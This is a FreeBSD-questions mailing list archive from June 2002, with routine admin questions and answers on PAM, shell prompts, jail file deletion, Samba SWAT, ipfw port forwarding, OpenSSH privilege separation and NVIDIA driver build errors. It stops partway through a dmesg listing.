freebsd-questions@freebsd.org Received: from midway.uchicago.edu (midway.uchicago.edu [128.135.12.12]) by hub.freebsd.org (Postfix) with ESMTP id 4F7FD37B410 for ; Tue, 25 Jun 2002 10:09:57 -0700 (PDT) Received: from Yggdrasil (adsl-68-20-16-240.dsl.chcgil.ameritech.net [68.20.16.240]) by midway.uchicago.edu (8.12.2/8.12.2) with ESMTP id g5PH9tIs027415; Tue, 25 Jun 2002 12:09:56 -0500 (CDT) Content-Type: text/plain; charset="iso-8859-1" From: David Syphers Reply-To: dsyphers@uchicago.edu To: Alexander V Zubchenko , FreeBSD Questions Subject: Re: Sysinstall replacement Date: Tue, 25 Jun 2002 12:09:55 -0500 User-Agent: KMail/1.4.1 References: <20020625121609.B1498-100000@server.hermes-comp.zp.ua> In-Reply-To: <20020625121609.B1498-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206251209.56093.dsyphers@uchicago.edu> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tuesday 25 June 2002 04:18 am, Alexander V Zubchenko wrote: > Greetings, All! > > I've read in manpage sysinstall(8): "This product is currently at the > end of it's life cycle and will eventually be replaced". For what kind > of thing it will, and when? Just pure interest. If somebody know. The replacement is libh. See http://www.freebsd.org/projects/libh.html. -David -- Everyone who believes in telekinesis, raise my hand... Astronomy and Astrophysics Center The University of Chicago To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10:13: 9 2002 Delivered-To: freebsd-questions@freebsd.org Received: from intense.net (server.intense.net [199.217.236.1]) by hub.freebsd.org (Postfix) with ESMTP id 09DD137B401 for ; Tue, 25 Jun 2002 10:12:56 -0700 (PDT) Received: (from root@localhost) by intense.net (8.12.3/8.12.3) id g5PHCt4q001588 for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 12:12:55 -0500 (CDT) (envelope-from bobber@intense.net) Received: from bob (209.248.134.245.nw.nuvox.net [209.248.134.245]) by intense.net (8.12.3/8.12.3av) with SMTP id g5PHCqau001575 for ; Tue, 25 Jun 2002 12:12:52 -0500 (CDT) (envelope-from bobber@intense.net) Message-ID: <028901c21c6a$f33a71c0$6c01a8c0@metropark.metropark.com> From: "Robert Herrold" To: Subject: Pam Authentication Module Date: Tue, 25 Jun 2002 12:08:33 -0500 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hopefully someone can help me out. I upgraded from 4.3 FreeBSD to 4.6. I was not running PAM prior to the upgrade. Now, I'm having some issues with my dialups. Radius authenticates fine, ftp works fine, but some (not all) of the sendmail accounts will not authenticate with popper unless I shell and reenter their passwords. Telnet has the same symptoms. My question: is there a way to remove PAM? If so, where? (all I have is the pam.conf) Thanks Bob To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10:34:25 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id 804A737B40D for ; Tue, 25 Jun 2002 10:33:54 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5PHXj4W049201; Tue, 25 Jun 2002 18:33:45 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5PHXeSU049200; Tue, 25 Jun 2002 18:33:40 +0100 (BST) Date: Tue, 25 Jun 2002 18:33:40 +0100 From: Matthew Seaman To: lists@brenius.com Cc: questions@FreeBSD.ORG Subject: Re: Permissions required for bash Message-ID: <20020625173340.GA15530@happy-idiot-talk.infracaninophi> References: <000701c21c59$ba6b5aa0$7b01a8c0@afi> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <000701c21c59$ba6b5aa0$7b01a8c0@afi> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 11:05:22AM -0400, lists@brenius.com wrote: > P.S. How do I add the server name to the prompt as well? In bash: export PS1="\h$ " In tcsh: set prompt="%m%# " Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10:35:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id 8AE8037B405 for ; Tue, 25 Jun 2002 10:35:20 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 8A65A243CF; Tue, 25 Jun 2002 12:35:15 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id 34272243BE; Tue, 25 Jun 2002 12:35:09 -0500 (CDT) Message-Id: <5.1.1.6.2.20020625121305.03d1f270@pop3s.schulte.org> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 25 Jun 2002 12:32:34 -0500 To: Fernando Gleiser , David Kramer From: Christopher Schulte Subject: Re: FreeBSD, Linux or Solaris Cc: In-Reply-To: <20020625135153.M403-100000@localhost> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 02:00 PM 6/25/2002 -0300, Fernando Gleiser wrote: >The main reasons I like FreeBSD over Linux are: >3. I like the feeling of a 'whole OS' instead of a kernel and a bunch of apps Yes, good point. One of the most compelling reasons to use FreeBSD over linux. The completeness and central administration over all the little bits of source code really goes a far way in terms of warm-fuzzy -happy-feeling. On a practical side, this integrated system source code has major advantages. Example: I have been maintaining one particular FreeBSD system since 4.1, released in mid 2000. Right now it's sitting at 4.5 (soon 4.6), having been upgraded through all new releases with no problems whatsoever. Not even the slightest burp. With linux, I generally leave an installed distro as is, for fear the slightest library change will cause a downward spiral. Code atrophy sets in, and before you know it it's time to rebuild a new box and migrate. That is an exaggeration, but the point is valid. The ports system is a delight to use Stability is there Security is a high priority (RELENG_4_X security branch for example) Device support is good (not quite as bleeding edge as linux, however all my hardware has worked without modification) Community support is good Developer <--> user interactions are mostly positive and further project goals Many other small 'warm-fuizzies' all add up to one great big happy smile, when dealing with FreeBSD. Linux works (go slackware!), Solaris works. If I have a choice, I almost always use FreeBSD. -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10:36:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dragoncrest.jasnetworks.net (dragoncrest.jasnetworks.net [65.194.254.12]) by hub.freebsd.org (Postfix) with ESMTP id 95AE837B403 for ; Tue, 25 Jun 2002 10:35:57 -0700 (PDT) Received: from works (works.jasnetworks.net [192.168.0.2]) by dragoncrest.jasnetworks.net (8.12.3/8.11.6) with ESMTP id g5PHlbgh094832; Tue, 25 Jun 2002 13:47:38 -0400 (EDT) (envelope-from raiden23@netzero.net) Message-Id: <4.2.0.58.20020625134233.009992b0@pop.netzero.net> X-Sender: raiden23@pop.netzero.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Tue, 25 Jun 2002 13:43:33 -0400 To: Christopher Schulte , Marco Radzinschi , FreeBDS-Questions From: Lord Raiden Subject: Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <5.1.1.6.2.20020624224948.02923518@pop3s.schulte.org> References: <20020624234646.G22328-100000@mail.radzinschi.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Ok, well we're still running OpenSSH 3.1 from the last security upgrade recommendation. Should we go straight to 3.3 or wait for the final fix? Secondly how do you enable this priv separation thing in the config file? I'm unfamiliar with that. At 10:51 PM 6/24/02 -0500, Christopher Schulte wrote: >At 11:47 PM 6/24/2002 -0400, Marco Radzinschi wrote: > >>I thought this might be of interest to some people on the list... >> >>---------- Forwarded message ---------- >>Date: Mon, 24 Jun 2002 15:00:10 -0600 >>From: Theo de Raadt >>To: bugtraq@securityfocus.com >>Cc: dsi@iss.net, announce@openbsd.org, misc@openbsd.org >>Subject: Upcoming OpenSSH vulnerability >> >>There is an upcoming OpenSSH vulnerability that we're working on with >>ISS. Details will be published early next week. > >[snip] > >Check over on -security, there is a very heated discussion happening right >now. > >-- >Christopher Schulte >http://www.schulte.org/ >Do not un-munge my @nospam.schulte.org >email address. This address is valid. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-questions" in the body of the message - The Raiden Knows "Remember amateurs built the ark -- professionals built the Titanic." - Unknown "Just when you think you have life figured out and all is going well, watch your step, for you are about to fall." - Ancient Proverb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10:40:38 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id 401E937B40B for ; Tue, 25 Jun 2002 10:39:50 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5PHdn4W049273; Tue, 25 Jun 2002 18:39:49 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5PHdiBG049272; Tue, 25 Jun 2002 18:39:44 +0100 (BST) Date: Tue, 25 Jun 2002 18:39:44 +0100 From: Matthew Seaman To: Mark Pearce Cc: "freebsd-questions@FreeBSD.ORG" Subject: Re: How do I delete files used in a jail Message-ID: <20020625173944.GB15530@happy-idiot-talk.infracaninophi> References: <20020625180143.768902ff.mark@netchat.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625180143.768902ff.mark@netchat.co.za> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 06:01:43PM +0200, Mark Pearce wrote: > I am trying to delete some directories that I was using within a > jail a while back. I try deleting and this is the errors I get: > > Any ideas why ? Perhaps the files have had the immutable flag set. Try: ls -loR jail to see what flags are set. chflags -R 0 jail should recursively remove all flag settings --- if you're running with securelevel >0, then you'll have to reboot to single user mode to get that to work. You chould then be able to rm -rf. Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10:49:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id B48E637B425 for ; Tue, 25 Jun 2002 10:48:12 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 5C049243F7; Tue, 25 Jun 2002 12:48:11 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id 23B1A243CF; Tue, 25 Jun 2002 12:48:07 -0500 (CDT) Message-Id: <5.1.1.6.2.20020625124040.041c50f0@pop3s.schulte.org> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 25 Jun 2002 12:45:33 -0500 To: Lord Raiden , Christopher Schulte , Marco Radzinschi , FreeBDS-Questions From: Christopher Schulte Subject: Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <4.2.0.58.20020625134233.009992b0@pop.netzero.net> References: <5.1.1.6.2.20020624224948.02923518@pop3s.schulte.org> <20020624234646.G22328-100000@mail.radzinschi.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 01:43 PM 6/25/2002 -0400, Lord Raiden wrote: > Ok, well we're still running OpenSSH 3.1 from the last security > upgrade recommendation. Should we go straight to 3.3 or wait for the > final fix? I believe the idea is to offer an upgrade to 3.3 now with privsep enabled ( 'UsePrivilegeSeparation yes' in sshd_config ) and be immune to the bug, then update to 3.3.1 (3.4?) when the full disclosure happens early next week. > Secondly how do you enable this priv separation thing in the > config file? I'm unfamiliar with that. See above. -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 10:54: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from transbay.net (mail.transbay.net [209.133.53.217]) by hub.freebsd.org (Postfix) with ESMTP id 2EAED37B405 for ; Tue, 25 Jun 2002 10:53:56 -0700 (PDT) Received: from borges (stalwart.codysbooks.com [209.133.54.175]) by transbay.net (8.11.2/8.11.2) with ESMTP id g5PHriY79850; Tue, 25 Jun 2002 10:53:52 -0700 (PDT) Subject: Re: SWAT/SAMBA problems From: Scott Reese Reply-To: sreese@codysbooks.com To: Steven Goodwin Cc: freebsd-questions@FreeBSD.ORG In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 10:53:51 -0700 Message-Id: <1025027639.14959.7.camel@borges.codysbooks.com> Mime-Version: 1.0 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, 2002-06-24 at 19:24, Steven Goodwin wrote: > > On 24 Jun 2002, Scott Reese wrote: > > > After successfully building and installing Samba 3.0 alpha-17 on my > > 4.6-RELEASE box, I have found that Swat does not work for some strange > > reason. I uncommented the swat line in /etc/inetd.conf, checked to make > > sure the service was listed in /etc/services (which it was) and then I > > HUP'd inetd and I still cannot connect to Swat. I've tried using > > 'http://localhost:901' as well as 'http://my.ip.address:901' and neither > > worked. This condition persisted after a reboot as well. > > It shouldn't require any rebooting on FreeBSD's side of things although > rebooting windows often works ;-) If your browser is using a http proxy, > disable it (on your browser) and try again. I only mentioned the rebooting as an additional data-point in case anyone was interested. I am aware that rebooting is not necessary, I just happened to need to in order to use the other OS on my machine for a bit. I am not using an http proxy of any sort. I checked the preferences in Mozilla and it's set to "direct connection to the internet." Thank you for the suggestion, though. Any other ideas? I have this same setup on another 4.6-RELEASE box at home and it works flawlessly...I'm not sure what's different here... -Scott To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 11: 4: 9 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailer.cia-g.com (mailer.cia-g.com [65.100.115.10]) by hub.freebsd.org (Postfix) with ESMTP id ACE8A37B400 for ; Tue, 25 Jun 2002 11:04:03 -0700 (PDT) Received: from cygnus.cia-g.com (data.cia-g.com [65.100.119.165]) by mailer.cia-g.com (Postfix) with ESMTP id 915FB3AD5; Tue, 25 Jun 2002 12:20:59 -0600 (MDT) Received: from raz by cygnus.cia-g.com with local (Exim 3.12 #1 (Debian)) id 17Mufa-00026g-00; Tue, 25 Jun 2002 12:04:02 -0600 Date: Tue, 25 Jun 2002 12:04:02 -0600 From: David Wilk To: Christopher Schulte Cc: Fernando Gleiser , David Kramer , freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris Message-ID: <20020625120402.A7861@cygnus.wks.Gallup.cia-g.com> References: <20020625135153.M403-100000@localhost> <5.1.1.6.2.20020625121305.03d1f270@pop3s.schulte.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.1.1.6.2.20020625121305.03d1f270@pop3s.schulte.org>; from schulte+freebsd@nospam.schulte.org on Tue, Jun 25, 2002 at 12:32:34PM -0500 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Ok, I hate to waste bandwidth here, but I have to quickly make a point. I'm not religious about things as I use what works best (IMHO) for the job as long as it's not micro$lop. My experience with FreeBSD has been great so far (ok, did *not* like ipfw's 'not-quite-stateful-inspection') and I especially like how extensive and current the ports collection is. However, I gotta disagree with the linux comments. First, the linux kernel is developed independant of the distributions, but not without regard to the userland utilities that it will work closely with. Second, it is the distributions job to integrate these two worlds so that they work seamlessly. Third, if you have not tried it, check out Debian. This *huge* group of developers work very hard to make an incredibly large number of packages available that are all tested as part of a complete system. Package management is awesome. two commands bring your installed base up-to-date with both security and bugfixes - services shutdown and restarted automagically. Releases take a while, so a system can seem a bit out-of-date, but are always solid. having the kernel separate from the system has the advantage of being able to do a complete release upgrade without taking down the system (you lose each service for a few seconds), or, upgrading the kernel for some new feature without having to upgrade the entire system. Dave On Tue, Jun 25, 2002 at 12:32:34PM -0500 or thereabouts, Christopher Schulte wrote: > At 02:00 PM 6/25/2002 -0300, Fernando Gleiser wrote: > >The main reasons I like FreeBSD over Linux are: > >3. I like the feeling of a 'whole OS' instead of a kernel and a bunch of apps > > Yes, good point. One of the most compelling reasons to use FreeBSD over > linux. The completeness and central administration over all the little > bits of source code really goes a far way in terms of warm-fuzzy > -happy-feeling. > > On a practical side, this integrated system source code has major > advantages. Example: I have been maintaining one particular FreeBSD system > since 4.1, released in mid 2000. Right now it's sitting at 4.5 (soon 4.6), > having been upgraded through all new releases with no problems > whatsoever. Not even the slightest burp. > > With linux, I generally leave an installed distro as is, for fear the > slightest library change will cause a downward spiral. Code atrophy sets > in, and before you know it it's time to rebuild a new box and > migrate. That is an exaggeration, but the point is valid. > > The ports system is a delight to use > > Stability is there > > Security is a high priority (RELENG_4_X security branch for example) > > Device support is good (not quite as bleeding edge as linux, however all my > hardware has worked without modification) > > Community support is good > > Developer <--> user interactions are mostly positive and further project goals > > Many other small 'warm-fuizzies' all add up to one great big happy smile, > when dealing with FreeBSD. > > Linux works (go slackware!), Solaris works. If I have a choice, I almost > always use FreeBSD. > > -- > Christopher Schulte > http://www.schulte.org/ > Do not un-munge my @nospam.schulte.org > email address. This address is valid. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- ******************************* David Wilk System Administrator Community Internet Access, Inc. admin@cia-g.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 11: 8:34 2002 Delivered-To: freebsd-questions@freebsd.org Received: from inigo.digitaldeck.com (twindolphin.digitaldeck.com [66.124.240.186]) by hub.freebsd.org (Postfix) with ESMTP id EACFD37B401 for ; Tue, 25 Jun 2002 11:08:24 -0700 (PDT) Received: from IVANOVA2K (ivanova-2k.office-ca1.digitaldeck.com [192.168.1.133]) by inigo.digitaldeck.com (8.11.6/8.11.3) with SMTP id g5PI8Ou08543 for ; Tue, 25 Jun 2002 11:08:24 -0700 (PDT) (envelope-from questions@digitaldeck.com) From: "Chris McCluskey" To: Subject: Outside-Outside port forwarding? Date: Tue, 25 Jun 2002 11:09:02 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, I am currently running a FreeBSD host based router using ipfw. The host contains two external ethernet interfaces, and a single internal interface running NATd. One of the external interfaces is sourced by a DSL connection and the other is sourced by a T1. The plan was to move servers from the DSL subnet to the T1 subnet. To insure that there was as little service interruption as possible, I planned on having the FreeBSD router forward all requests from the server's old ip_addr:port (on the DSL interface) to the servers now on the T1's ethernet interface. In some sense I was just hoping to do a simple port-forward from an address on one external interface to another. Almost like turning NATd upside down. I haven't found much in the usual sources... Any pointers? Thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 11:13:42 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by hub.freebsd.org (Postfix) with SMTP id 32E4537B400 for ; Tue, 25 Jun 2002 11:13:37 -0700 (PDT) Received: (qmail 13117 invoked by uid 0); 25 Jun 2002 18:13:30 -0000 Received: from unknown (HELO corrsl7vs6l3tz) (203.197.109.208) by mail.gmx.net (mp002-rz3) with SMTP; 25 Jun 2002 18:13:30 -0000 Message-ID: <002401c21c73$e874f130$d06dc5cb@corrsl7vs6l3tz> From: "Sanjay Bhattacharya" To: "Martin Klaffenboeck" Cc: References: <20020624140920.A22529@skytrackercanada.com> <1024945144.7531.11.camel@martin.kleinerdrache.org> Subject: Re: can't telnet anything on port 25 Date: Tue, 25 Jun 2002 23:42:41 +0530 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Believe me, this is a firewall problem. The remote machine (skytrackwhatever) , in your case might be having a firewall which is blocking an SMTP connection generating from an arbitrary port from your machine. You can try telnetting to other smtp servers. You can find the smtp server for a domain by the command : host -t mx blahblah.com rgds, Sanjay > > I can't seem to telnet any server on port 25; > > > > su-2.03# telnet skytrackercanada.com 25 > > Trying 209.188.66.29... > > telnet: connect to address 209.188.66.29: Operation timed out > > telnet: Unable to connect to remote host > > su-2.03# > > Are you sure you have access on port 25 on the remote machine? How have > you tryed that and how can you be sure? > > Martin > > -- > Virtuelle Jugendarbeit auf http://create.kleinerdrache.org > ... bald kommt ein neues Layout ... > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 11:21:43 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cerebellum.za.net (cerebellum.za.net [196.34.172.103]) by hub.freebsd.org (Postfix) with ESMTP id 4A62437B401 for ; Tue, 25 Jun 2002 11:20:51 -0700 (PDT) Received: from bert (vic-dial-196-30-239-42.mweb.co.za [196.30.239.42]) by cerebellum.za.net (8.11.6/8.11.3) with SMTP id g5PIJlG23055 for ; Tue, 25 Jun 2002 18:19:56 GMT (envelope-from ian@cerebellum.za.net) From: "Ian Barnes" To: Subject: Getting NV-BSD to work Date: Tue, 25 Jun 2002 20:21:31 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, I am trying to get Nv-BSD to run, NV-BSD is a graphics driver initiative for Nvidia Graphics Cards, when trying to compile it, i get the errors bellow. The file versions i downloaded are : nv-bsd-090102.tar.gz NVIDIA_kernel-1.0-2960.tar.gz NVIDIA_GLX-1.0-2960.tar.gz Included are the outputs when i type make, my dmesg, and an ls -l of the nv-bsd dir. ********THIS IS THE MAKE************* [root@nicki] ~/nvidia/nv-bsd # make Warning: Object directory not changed from original /root/nvidia/nv-bsd @ -> /usr/src/sys machine -> /usr/src/sys/i386/include perl @/kern/makeops.pl -h @/kern/device_if.m perl @/kern/makeops.pl -h @/kern/bus_if.m perl @/kern/makeops.pl -h @/pci/pci_if.m perl @/kern/vnode_if.pl -h @/kern/vnode_if.src cc -O -pipe -D_KERNEL -Wall -Wredundant-decls -Wnested-externs -Wstrict-protot ypes -Wmissing-prototypes -Wpointer-arith -Winline -Wcast-qual -fformat-extens ions -ansi -DKLD_MODULE -nostdinc -I- -I. -I@ -I@/../include -I/usr/include -m preferred-stack-boundary=2 -Wall -Wredundant-decls -Wnested-externs -Wstrict-pro totypes -Wmissing-prototypes -Wpointer-arith -Winline -Wcast-qual -fformat-ext ensions -ansi -D__KERNEL__ -c nv.c nv.c: In function 'nv_map_device': nv.c:72: incompatible types in assignment nv.c:73: warning: format argument is not a pointer (arg 3) nv.c:74: structure has no member named 'regs_u' nv.c:75: incompatible types in assignment nv.c:76: warning: format argument is not a pointer (arg 3) nv.c:77: structure has no member named 'fb_u' nv.c: In function 'nv_int10h_call': nv.c:106: structure has no member named 'regs_u' nv.c: In function 'nv_find_alloc': nv.c:146: warning: label 'done' defined but not used nv.c: At top level: nv.c:202: warning: function declaration isn't a prototype nv.c:207: warning: function declaration isn't a prototype nv.c: In function 'nv_vtop': nv.c:326: warning: pointer of type 'void *' used in subtraction nv.c:333: warning: comparison between pointer and integer nv.c:355: warning: pointer of type 'void *' used in arithmetic nv.c: In function 'nv_attach': nv.c:483: structure has no member named 'reg_physical_address' nv.c:485: structure has no member named 'fb_physical_address' nv.c:488: structure has no member named 'reg_physical_address' nv.c:489: structure has no member named 'fb_physical_address' nv.c:499: structure has no member named 'interrupt_pin' *** Error code 1 Stop in /root/nvidia/nv-bsd. [root@nicki] ~/nvidia/nv-bsd # ***************THIS IS THE DMESG.OUT*************** Copyright (c) 1992-2002 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.6-STABLE #1: Mon Jun 17 12:04:24 SAST 2002 root@:/usr/src/sys/compile/NICKI Timecounter "i8254" frequency 1193182 Hz CPU: Pentium III/Pentium III Xeon/Celeron (501.14-MHz 686-class CPU) Origin = "GenuineIntel" Id = 0x673 Stepping = 3 Features=0x383f9ff real memory = 536805376 (524224K bytes) avail memory = 518631424 (506476K bytes) Preloaded elf kernel "kernel" at 0xc039d000. Preloaded elf module "splash_bmp.ko" at 0xc039d09c. Preloaded splash_image_data "/boot/nicki.bmp" at 0xc039d140. Pentium Pro MTRR support enabled md0: Malloc disk npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pcib0 pcib1: at device 1.0 on pci0 pci1: on pcib1 pci1: at 0.0 irq 11 isab0: at device 7.0 on pci0 isa0: on isab0 atapci0: port 0xf000-0xf00f at device 7.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 pci0: at 7.2 irq 10 chip1: port 0x5000-0x500f at device 7.3 on pci0 ed0: port 0xd400-0xd41f irq 11 at device 9.0 on pci0 ed0: address 00:c0:df:f5:38:84, type NE2000 (16 bit) pcm0: port 0xd800-0xd81f irq 5 at device 11.0 on pci0 ahc0: port 0xe000-0xe0ff mem 0xe9000000-0xe9000fff irq 5 at device 13.0 on pci0 aic7860: Ultra Single Channel A, SCSI Id=7, 3/253 SCBs orm0: Hi
